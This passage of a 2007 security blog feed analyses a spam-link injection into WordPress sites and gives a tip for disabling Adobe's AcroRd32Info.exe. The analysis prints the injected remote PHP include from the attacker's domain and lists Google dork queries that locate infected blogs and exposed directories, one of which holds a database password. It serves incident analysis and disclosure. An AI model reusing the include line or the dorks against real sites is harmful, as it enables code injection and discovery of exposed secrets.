<dd><a href="http://blog.kakkoi.net/uri/d29yZHByZXNzLm9yZy9zdXBwb3J0L3RvcGljLzEzOTQ1NQ.curie,80,302" rel="external" rev="wordpress:forum" title="php get footer adding spam code">php get footer adding spam code?</a></dd>
<dt style="clear:left;float:left;margin-right:3px;width:150px"><small>2.</small>&nbsp;elijahzarwan.net</dt>
<dd><a href="http://blog.kakkoi.net/uri/ZWxpamFoemFyd2FuLm5ldC9ibG9nLz9wPTQzMw.curie,80,302" rel="external nofollow robots-nofollow" class="curie" rev="elijahzarwan:entries" title="div id=&quot;goro&quot;"><strong style="font-weight:400">div id=”Goro”</strong></a> <small>(nice headline)</small>
</dl>
<p> Both site suggest same type of php injection methods<br />
<code lang="php"> include('http://wordpress.net.in/statcounter.php');</code>
</p>
<p>The statcounter.php is just normal text/plain full with spam links. The spam content on Matt Heaton blog is randomly generate from <strong>http://wordpress.net.in/</strong>[random]/ random = 1 - 9.</p>
</div>
<h2 id="raw-whois" style="clear:left;margin-top:18px; border-top: 1px solid #ccc; padding-top:18px">Raw whois for wordpress.net.in</h2>
<pre class="prebox">
Domain ID:D2500581-AFIN
Domain Name:WORDPRESS.NET.IN
Created On:22-Apr-2007 12:01:55 UTC
Last Updated On:22-Jun-2007 02:26:40 UTC
Expiration Date:22-Apr-2008 12:01:55 UTC
Sponsoring Registrar:Direct Information Pvt. Ltd. dba PublicDomainRegistry.com (R5-AFIN)
Status:OK
Registrant ID:DI_4275224
Registrant Name:Mick Jagger
Registrant Organization:N/A
Registrant Street1:1 Red Square
Registrant City:Moscow
Registrant State/Province:Massachusetts
Registrant Postal Code:123592
Registrant Country:RU
Registrant Phone:+007.7581235641
Registrant Email:mkk.goro@bk.ru
Admin ID:DI_4275224
Admin Name:Mick Jagger
Admin Organization:N/A
Admin Street1:1 Red Square
Admin City:Moscow
Admin State/Province:Massachusetts
Admin Postal Code:123592
Admin Country:RU
Admin Phone:+007.7581235641
Admin Email:mkk.goro@bk.ru
Tech ID:DI_4275224
Tech Name:Mick Jagger
Tech Organization:N/A
Tech Street1:1 Red Square
Tech City:Moscow
Tech State/Province:Massachusetts
Tech Postal Code:123592
Tech Country:RU
Tech Phone:+007.7581235641
Tech Email:mkk.goro@bk.ru
Name Server:MKKG98981.MERCURY.ORDERBOX-DNS.COM
Name Server:MKKG98981.VENUS.ORDERBOX-DNS.COM
Name Server:MKKG98981.EARTH.ORDERBOX-DNS.COM
Name Server:MKKG98981.MARS.ORDERBOX-DNS.COM
</pre>
<p class="note" style="margin:10px;padding:10px;border:1px solid #eee">Note: The registrant address on <abbr title="1 red square, Moscow">1 red square</abbr> is a famous restaurant in Moscow.</p>
<p> Its pretty obvious that <tt>wordpress.net.in</tt> belong to registrar in India.</p>
<h2 style="clear:left;margin-top:18px; border-top: 1px solid #ccc; padding-top:18px">Live example wordpress.net.in injection </h2>
<p> Google query for <tt style="background-color:#fff7c7;color:#444;padding:3px">warning &#8220;[function.include]&#8221; allintext: &#8220;wordpress.net.in&#8221; </tt> . Used <a href="http://blog.kakkoi.net/uri/d3d3LmZpZGRsZXJ0b29sLmNvbS9maWRkbGVyLw.curie,80,302" rel="nofollow external robots-nofollow" rev="fiddler:httpdump">fiddler</a> or any http-inspector to trace the full header request.
</p>
<dl id="meta-search-results-wordpress-net-in-inject" class="google-query" style="line-height:1.6em">
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>1</small>&nbsp;Evan Morris</dt>
<dd>Wordpress 2.0.6 | <a href="http://blog.kakkoi.net/uri/d3d3LndvcmQtZGV0ZWN0aXZlLmNvbS93b3JkcHJlc3MvP3A9MTIy.curie,80,302" rel="nofollow external robots-nofollow">url</a> | <a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/wordpressnetin-goro-injection.png' title='wordpress.net.in goro injection'>screenshot</a></dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>2</small>&nbsp;carwax</dt>
<dd>Wordpress 1.5.2 | <a href="http://blog.kakkoi.net/uri/YmxvZy5jYXJ3YXhwcm9kdWN0aW9ucy5jb20vP209MjAwNjAz.curie,80,302" rel="external nofollow" title="blog.carwaxproductions.com">url</a> | screenshot </dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>3</small>&nbsp;aabenthus.biz</dt>
<dd>Wordpress 2.0.x | <a href="http://blog.kakkoi.net/uri/YWFiZW50aHVzLmJpeg.curie,80,302" rel="external nofollow robots-nofollow">url</a> | screenshot </dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>4</small>&nbsp;mythinger.com</dt>
<dd>Wordpress 2.0.2 | <a href="http://209.85.173.104/search?q=cache:w5Sd6heMJL0J:johnboone.mythinger.com/+wordpress.net.in&#038;hl=en&#038;ct=clnk&#038;cd=21&#038;gl=us&#038;client=firefox-a">url</a> | <a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/johnboonemythingercom-wordpressnetin.png' title='johnboone.mythinger.com wordpress.net.in'>screenshot</a></dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>5</small>&nbsp;classicalanglican.net</dt>
<dd>Wordpress 2.0.2 | <a href="http://209.85.173.104/search?q=cache:fZb5-RNSGv0J:titusonenine.classicalanglican.net/%3Fp%3D13132+wordpress.net.in&#038;hl=en&#038;ct=clnk&#038;cd=22&#038;gl=us&#038;client=firefox-a" rel="external nofollow">url</a> | <a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/titusonenineclassicalanglicannet-wordpressnetin.png' title='titusonenine.classicalanglican.net wordpress.net.in'>screenshot</a>
</dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>6</small>&nbsp;echo9er.net</dt>
<dd>WordPress 1.5.1 | <a href="http://blog.kakkoi.net/uri/d3d3LmVjaG85ZXIubmV0L2Jsb2cvP3A9MjQwMA.curie,80,302" rel="external nofollow">url</a> | screenshot </dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>7</small>&nbsp;boyarick.com</dt>
<dd> Wordpress 2.0.2 | <a href="http://blog.kakkoi.net/uri/Ym95YXJpY2suY29tL2Jsb2cvP3A9MTM2.curie,80,302" rel="nofollow external robots-nofollow">url</a> | screenshot</dd>
</dl>
<h2 style="clear:left;margin-top:18px; border-top: 1px solid #ccc; padding-top:18px">Google Directory search for class-mail.php</h2>
<p>Search for <strong>class-mail.php</strong> in open directory (public).<br />
<tt style="background:#fff7c7;color:#444;padding:3px">&#8220;parent directory&#8221; class-mail.php -html -htm –php -shtml -md5 -md5sums</tt></p>
<ul class="xoxo">
<li> <strong>jean-cyril.com</strong> - <a href="http://blog.kakkoi.net/uri/d3d3LmplYW4tY3lyaWwuY29tL3dwLWluY2x1ZGVzLw.curie,80,302" rel="nofollow external robots-nofollow" rev="wordpress:directory">wp-includes</a> &middot; spams link redirect to <tt>www.901am.com/?page=2157</tt>. jean-cyril.com has wp-info.txt inside his wp-includes directory. This text files hold unserialize database password and stuff.</li>
<li> <strong>floaridablog.org</strong> - <a href="http://blog.kakkoi.net/uri/ZmxvcmlkYWJsb2cub3JnL3dvcmRwcmVzcy93cC1pbmNsdWRlcy8.curie,80,302" rel="nofollow external robots-nofollow" rev="wordpress:directory">wp-includes</a> &middot; spams redirect to <tt>communications.uml.edu/sunrise/?id=1076</tt> (University of Massachusetts Lowell) the offending spams page has been removed by UML maintainer.</li>
</ul>
<h2 tyle="clear:both;margin-top:18px; padding-top:18px">Hiding from search engine Spiders</h2>
<p>First, I did some more comparative search at <a href="http://archive.org" rel="external" rev="webservices:alexa">archive.org</a> for howardowens.com and mattheaton.com. It turn out both of this sites has been stop from IA Archiver few months before the spams start showing on their footer. You will need to check howardowens index on archive.org so you can understand my suspicious.</p>
<ul>
<li>http://web.archive.org/web/*/http://www.howardowens.com</li>
<li>http://web.archive.org/web/*/http://www.mattheaton.com</li>
</ul>
<p>Out of boredom I cloaked myself as the following agents.</p>
<ul>
<li>Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) - 74.6.8.125 - llf520032.crawl.yahoo.net</li>
<li>Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 66.249.64.50 - crawl-66-249-64-50.googlebot.com</li>
<li>Mozilla/2.0 (compatible; Ask Jeeves/Teoma) - 65.214.44.204 - egspd42002.ask.com</li>
<li>Mediapartners-Google/2.1 66.249.73.213 - crawl-66-249-73-213.googlebot.com
</ul>
<p>Not much change on both of these sites. Then I read the status header, it return 404 instead of 200. Nice tricks for stopping crawler &#038; spider from spying their joy-ride-spamhouse.
</p>
<h2 tyle="clear:both;margin-top:18px; padding-top:18px">Summary</h2>
<p>bits &#038; bytes from this accident we knew that</p>
<ul>
<li>Most of the site inject are running on wordpress 2.0.6 &#038; below</li>
<li><strong>allow_furl_open</strong> is set to true for this injection to work</li>
<li>Most of the blogs owner is unaware about the spams links (cloacking)</li>
</ul>
<p>Checkout Murray <a href="http://gmodules.com/ig/proxy?url=http://www.murrayc.com/blog/wp-content/uploads/2007/11/access_log.txt" rel="nofollow external" class="exturl icn-r" type="text/plain">access log</a>, it will give you some ideas with the remote injections methods.</p>
<h2>Update </h2>
<dl>
<dt>Dec 03 2007</dt>
<dd>All the spams link to <tt>howardowens.com</tt> page has been removed. I havent talk with howardowens but I assume howard&#8217;s site is being injected the same way like Matt Heaton blog.</dd>
<dt>Dec 04 2007</dt>
<dd>Mattheaton.com has a minor update, the spams now inject on both header and footer.<br />
<tt>tangonoticias.com:7070/d_pill/577.html</tt>.<br />
As tangonoticias.com is running on Joomla CMS they create a static &#8220;Wordpress&#8221; on port 7070 (Real Network Server &#038; RSTP Port). This is probably a work of different attacker, taking advantage of Matt heaton blindspot. <a href="http://64.233.167.104/search?q=cache:xjPu95m8yEAJ:mattheaton.com&#038;hl=en&#038;ct=clnk&#038;cd=1&#038;gl=us">Google Cache</a> <small>(Nov 12)</small> </dd>
<dt>Dec 11 2007</dt>
<dd>Matt heaton has been purified. He&#8217;s now using latest version of Wordpress (2.3.1). You can still view it on cached thought &#038; <a href="http://blog.kakkoi.net/uri/d3d3LnNoYXJlYXBpYy5uZXQvY29udGVudC5waHA_aWQ9NDY2OTg1Mw.curie,80,302" rel="nofollow external" rev="sharepic:gallery">screenshot</a>. </dd>
</dl>
<h2>Related Post</h2>
<ul class="xoxo">
<li><a href="wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/"> How to Removed wordpress.net.in Spam Injection</a></li>
<li><small>Jan 31st, 2008</small> - <a href="/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/">Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II</a></li>
</ul>
<h2 id="related-entries" class="mgb-">External Links</h2>
<ul class="xoxo pdt exturl">
<li><a href="http://www.mattheaton.com">Bluehost Hostmonster CEO&#8217;s blog</a></li>
<li><a href="http://blog.kakkoi.net/uri/d3d3LnJvYnRleC5jb20vZG5zL3dvcmRwcmVzcy5uZXQuaW4uaHRtbA.curie,80,302" rev="robtex:lookup" rel="nofollow external robots-nofollow" title="Lookup via robtext">DNS Lookup results for wordpress.net.in</a></li>
<li><a href="http://blog.kakkoi.net/uri/d3d3LmFib3V0dXMub3JnL01hdHRIZWF0b24uY29t.curie,80,302" rel="external nofollow robots-nofollow" rev="aboutus:mattheaton" title="View mattheaon.com wiki on Aboutus.org">Aboutus.org wiki on MattHeaton.com</a></li>
<li><a href="http://blog.kakkoi.net/uri/bnZkLm5pc3QuZ292L252ZC5jZm0_Y3ZlbmFtZT1DVkUtMjAwNi00NzQz.curie,80,302" rel="external nofollow robots-nofollow" rev="nvd:cve2006-4743" class="curie" title="National Vulnerabilities Database CVE 2006-4743">National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities</a></li>
<li><a href="http://blog.kakkoi.net/uri/d3d3Lm11cnJheWMuY29tL2Jsb2cvcGVybWFsaW5rLzIwMDcvMTEvMTYvbXktd29yZHByZXNzLWNyYWNrZWQv.curie,80,302" rel="external nofollow robots-nofollow" rev="wordpress:hacked" title="My Wordpress Cracked">Murray&#8217;s Blog My Wordpress Cracked</a></li>
<li><a href="http://pseudo-flaw.net/log/20/more-random-wordpress-blogs-and-al-gore-owned-by-seo-spammers">pseudo-flaw - more random wordpress blogs owned by seo spammers</a>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to safely remove AcroRd32Info.exe</title>
		<link>http://42.kaizeku.com/windows/how-to-safely-removed-acrord32infoexe-adobe-reader/</link>
		<comments>http://42.kaizeku.com/windows/how-to-safely-removed-acrord32infoexe-adobe-reader/#comments</comments>
		<pubDate>Thu, 29 Nov 2007 13:05:00 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Acrobat Reader]]></category>

		<category><![CDATA[Adobe]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[Windows]]></category>

		<category><![CDATA[AcroRd32Info]]></category>

		<category><![CDATA[acrotray]]></category>

		<category><![CDATA[AdobeReader.K]]></category>

		<category><![CDATA[Explorer]]></category>

		<category><![CDATA[Malware]]></category>

		<category><![CDATA[pdf]]></category>

		<category><![CDATA[prefetching]]></category>

		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/windows/how-to-safely-removed-acrord32infoexe-adobe-reader/</guid>
		<description><![CDATA[<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/11/acrord32info.jpg' alt='AcroRd32Info' style="float:left;margin-right:3px;margin-bottom: 0px" /><strong><a href="http://www.adobe.com/products/acrobat/readstep2.html">AcroRd32Info</a></strong> is a another creative pieces of crap from <a href="http://www.adobe.com">Adobe</a> a package  for Acrobat Reader. Embed in Windows Explorer Shell, its main role is to start an initial prefetching for PDF documents in the Memory.</p>

<p>To test this program behavior, you will need to open your windows task manager (ctrl+alt+del once) and browse to any folder that contained a PDF documents and stay idle. Within just few seconds <strong>AdobeRd32Info</strong> will be loaded in the background and stay in memory.That was just for  browsing the folder without opening any PDF files yet.</p> 

<p>Windows has a standard prefetch modes and its fairly stable for most of the applications out there. Having a another background prefetcher hook on explorer is plain abusive not to mention its running without the owner permissions.</p> 

<p>AcroRd32Info stay in your memory so consider it as a pest. So how to disabled it?</p>
]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/11/acrord32info.jpg' alt='AcroRd32Info' style="float:left;margin-right:3px;margin-bottom: 0px" /><strong><a href="http://www.adobe.com/products/acrobat/readstep2.html">AcroRd32Info</a></strong> is a another creative pieces of crap from <a href="http://www.adobe.com">Adobe</a> a package for Acrobat Reader. Embed in Windows Explorer Shell, its main role is to start an initial prefetching for PDF documents in the Memory.</p>
<p><span id="more-37"></span></p>
<p>To test this program behavior, you will need to open your windows task manager (ctrl+alt+del once) and browse to any folder that contained a PDF documents and stay idle. Within just few seconds <strong>AdobeRd32Info</strong> will be loaded in the background and stay in memory.That was just for browsing the folder without opening any PDF files yet.</p>
<p>Windows has a standard prefetch modes and its fairly stable for most of the applications out there. Having a another background prefetcher hook on explorer is plain abusive not to mention its running without the owner permissions.</p>
<p>Adobe Reader is cheating. Its understable that with this methods it will improve the Acrobat boot time log, but I dont see much differences when its running in the background preparing to load a single PDF documents, its a pollutions.</p>
<p>AcroRd32Info stay in your memory so consider it as a <span class="hilite-3">pestware</span>.</p>
<p>Here&#8217;s how you can <em>safely</em> removed this programs. </p>
<h3 id="removed">The proper way</h3>
<ul>
<li>open <strong>Adobe AcroRd32</strong></li>
<li>Edit &raquo; Preferences </li>
<li>Select the <strong>internet</strong> categories in the menu list then disabled <br /><strong>Allow fast web view</strong> &#038; <strong>Allow speculative downloading in the background</strong></li>
</ul>
<p>If thats doesnt work, you try this <strong>unrecommended</strong> method to disabled it.</p>
<ul>
<li>Browse to Adobe Reader directory usually at &#8220;Program Files\Adobe\Reader\&#8221; </li>
<li>Find <strong>AcroRd32Info.exe</strong></li>
<li>Rename it from <strong>AcroRd32Info.exe</strong> to <strong>Acro_Rd32Info.exe</strong></li>
</ul>
<h2>Recent Exploit on Adobe Reader</h2>
<h3 id="AdobeReaderK">Exploit:W32/AdobeReader.K</h3>
<p class="notice" style="padding:10px;margin:18px auto;border:1px solid #ccc">From FSECURE, <a href="http://blog.kakkoi.net/uri/d3d3LmYtc2VjdXJlLmNvbS92LWRlc2NzL2V4cGxvaXRfdzMyX2Fkb2JlcmVhZGVyX2suc2h0bWw.curie,80,302" rel="external" title="External site">Exploit:W32/AdobeReader.K</a> is detection of a malicious PDF file that is being heavily spammed through e-mail and it appears as an attachment.<br />
This malicious PDF file takes advantage of a vulnerability on the URI handling of PDF files. This vulnerability affects IE7, Adobe Acrobat, and Adobe Reader on some platforms.<br />
Users should update their Adobe Reader installations. </p>
<h3>Affected Software Versions</h3>
<p>Adobe Reader 8.1 and earlier, Adobe Reader 7.0.9 and earlier. Adobe Acrobat Professional, 3D and Standard 8.1 and earlier versions, Adobe Acrobat Professional, Standard, 3D and Elements 7.0.9 and earlier.</p>
<p>More info on this exploits at <a href="http://blog.kakkoi.net/uri/bnZkLm5pc3QuZ292L252ZC5jZm0_Y3ZlbmFtZT1DVkUtMjAwNy01MDIw.curie,80,302">National Vulnerability Database</a></p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/windows/how-to-safely-removed-acrord32infoexe-adobe-reader/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
